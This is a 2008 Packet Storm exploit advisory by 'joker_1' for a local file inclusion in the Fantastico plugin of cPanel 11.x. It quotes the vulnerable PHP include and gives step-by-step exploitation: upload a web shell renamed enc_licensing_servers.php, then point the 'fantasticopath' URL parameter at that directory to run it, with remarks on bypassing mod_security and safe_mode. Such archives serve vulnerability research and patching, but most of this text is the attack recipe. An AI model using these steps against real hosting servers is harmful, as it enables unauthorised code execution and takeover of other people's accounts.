cpanel-lfi.txt

2008-09-15T00:00:00
ID PACKETSTORM:69980
Type packetstorm
Reporter joker_1
Modified 2008-09-15T00:00:00

Description

                                        
                                            `##############################################################  
Fantastico In all Version Cpanel 11.x <= local File Include  
  
##############################################################  
  
  
Must login to :2082  
To break the protection mod_security & safe_mode: off & Disable functions : all none  
  
  
  
Vulnerable Code  
  
$licensing_servers=$fantasticopath . "/includes/enc_licensing_servers.php";  
if (is_file($licensing_servers))  
{  
include($licensing_servers);  
  
  
in  
  
http://xx.com:2082/frontend/x/fantastico/includes/xml.php  
  
  
Exploit >>  
  
First Create directory Let the name /includes/ and upload Shell.php in /includes/ Then rename it to enc_licensing_servers.php  
  
  
:::xploit::::  
  
http://xxx.com:2082/frontend/x/fantastico/includes/xml.php?fantasticopath=/home/user  
  
  
  
###################################################  
  
Discoverd By : joker_1  
  
  
  
for info : pl57@msn.com  
  
  
  
###################################################  
  
Special Greetings :- sniper-sa.com & Group XP & Alm3reFh.Com & Genral kbkb & step on the snow & red trigger & qalbhamad & saudi star  
  
###################################################  
  
`